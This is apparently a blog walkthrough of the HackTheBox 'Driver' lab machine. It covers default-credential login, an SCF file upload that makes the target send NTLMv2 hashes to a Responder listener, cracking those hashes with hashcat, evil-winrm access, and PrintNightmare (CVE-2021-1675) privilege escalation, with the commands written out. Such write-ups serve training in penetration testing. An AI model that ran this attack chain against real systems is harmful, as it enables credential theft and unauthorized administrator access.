In this post, I would like to share a walkthrough of the Driver Machine from HackTheBox

This room has been considered difficulty rated as an Easy machine on HackThebox

Source: HackTheBox

What will you gain from the Driver machine?

For the user flag, you will execute the SMB relay approach to obtain tony’s password

As for the root flag, you need to execute an exploit related to PrintNightMare

Information Gathering

Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 

Let’s try to access the website interface

We are required to key in the username and password to login to the Dashboard. My assumption of the credentials would be admin:admin

## Surely people are thinking about how I get the username admin? If you look carefully, there’s wording such as “Please enter a password for admin” ##

Finally, we managed to login into the Dashboard.

Gaining the Privileges Access

On the menu bar, there’s nothing that can be used except the Firmware Updates function which leads to a page that requires us to update the printer’s firmware.

From the result, I notice there’s a lot of Metasploit methods which I try to avoid using it. However, we managed to sight a website that guide us to exploit the machine without using Metasploit.

Source: SMB Relay – Penetration Testing Lab (pentestlab.blog)

As a result, we will need to create a file under the SCF format that is shown in the screenshot above.

The only modification needed would be \\<Your IP Address>\share\<anyname>.ico

Let’s run the tools Responder by using “sudo responder -wrf –lm -v -I tun0” which the tool stops at “Listening for the event

Once the responder has been started, we can finally attach the SCF file format to the website and click “Submit

After a while, we have been provided with a lot of NTLMv2 hash which only assigned to tony

Let’s save the first hashes into a file and try to obtain the password from it using hashcat command such as “hashcat -m 5600 -a o <hash file> /<your file location that stored the rockyou>/rockyou.txt

Finally, we have the password for tony which liltony.

Let’s try to login the machine via an evil-winrm tool which requires the command like evil-winrm -i 10.10.11.106 -u tony -p liltony

We can read the user flag by executing the command “type C:\Users\tony\Desktop\user.txt

Escalate to Admin Privileges on Driver Machine

PrintNightMare Vulnerability

At last, I can test the PrintNightMare Vulnerability on HTB Machine.

For those who are not familiar with the PrintNightMare exploit, you can google it on the internet.

Firstly, you need to download the PrintNightMare exploit by running the command “git clone https://github.com/calebstewart/CVE-2021-1675” on your own machine.

After that, we can upload the CVE-2021-1675.ps1 into the HTB’s machine.

Next, we can use the command “Import-Module .\CVE-2021-1675.ps1

Finally, we can create a new username and password by using the Invoke-Nightmare -NewUser “anything” -NewPassword “anything”

As a result, we can login the machine using the credentials that we created earlier.

We should be able to obtain the root flag by executing “type C:\Users\administrator\Desktop\root.txt

Additional Information

In case we found an error when trying to import the module of the ps1 file on the HTB’s machine, we can try to download the file into the machine using the IEX command shown below:

Leave a Reply

Your email address will not be published. Required fields are marked *